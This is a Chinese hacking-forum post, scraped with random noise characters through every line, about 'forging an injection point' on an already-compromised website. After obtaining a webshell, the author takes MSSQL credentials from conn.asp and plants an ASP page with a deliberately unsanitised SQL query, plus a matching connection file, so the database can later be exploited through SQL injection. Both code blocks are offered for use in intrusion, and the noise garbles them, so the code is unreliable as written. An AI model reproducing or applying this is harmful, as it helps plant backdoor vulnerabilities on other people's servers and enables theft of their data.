自己构造注入点方便入侵
3 _8 Q9 `* n6 p: s2 s- S/ F5 }; ]$ w! E3 a
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息9 D/ N4 w# d! D# Z9 w
7 U7 T# f# Y+ x
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
1 ^! j7 n( k7 Q, T, c9 ?0 N1 o4 `' }+ |; x: O& S. I
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和) _# K# Q) ~4 n3 u% l2 ^
v, l0 E) p. C! y$ [
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
3 n+ l/ W' V8 x% J, W! r- n, i
) |6 E0 K4 e3 c7 Z& v因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
6 c# B7 u" H) p4 s9 z" ~5 t+ A+ k4 \' {' C* c% O" }
程序代码
2 L, O3 M' W$ D<!--#include file="xx.asp"-->
K/ c+ t L& \1 Y( \) V: [. g' {<%
) ?: f; T( e( n) r6 ]+ ^$ K: F" k. |+ Xset rs=server.createobject("ADODB.recordset")
. P I2 @0 @! A4 Xid = request("id")
5 e+ _; _! K+ f' G& ]8 C; zstrSQL = "select * from admin where id=" & id
9 ^6 A" b( z" o' R' G2 {rs.open strSQL,conn,1,3
. g& c( P: j0 d8 K: ]% W( t7 Crs.close6 Z; p/ a9 u% c/ s& l; r
%>
; P) O9 M, W+ Y
2 V1 A+ U9 K) W9 x! _! g把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
2 i( L" k8 C8 O5 d
0 i; u8 { B% `你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
* t7 s7 Q- [- z9 [% ?! w, ~: @5 f. G0 o/ L, [& d& T0 k
然后就要构造一个连接数据库的文件了,代码如下:
8 @- b( X( u1 j程序代码
$ l* p0 @1 E" \( {% Q( a* y<% 2 o0 e; p( G) g: O' W1 Z5 o& h
strSQLServerName = "000.000.000.000" '服务器名称或地址 x1 _4 _4 p7 L* o
strSQLDBUserName = "sqlname" '数据库帐号
) z' C$ G8 f G) Q" V) Z2 e6 {strSQLDBPassword = "sqlpass" '数据库密码4 L5 Q( L* g, Z8 e& u% z
strSQLDBName = "sqldataname" '数据库名称
1 _( u! E( O0 ~$ o5 g2 h* nSet conn = Server.CreateObject("ADODB.Connection")" F' Y% u* L9 r
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
$ j2 r0 {. R- Qconn.open strCon8 ^* h" j9 x" r
%>$ B# C5 y: N( |
$ L, i! B" c! W1 z& h1 k) j这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
+ _; ]6 O) s9 V$ X0 O
7 l" C( R1 Y; t/ O就这样,正常情况下,就OK了,伪造成功……3 J) I& v; M: S+ x% i$ {
; t, r) `, q# N* `+ [6 k$ C+ l
如果有什么问题可以提出来大家一起探讨解决。 |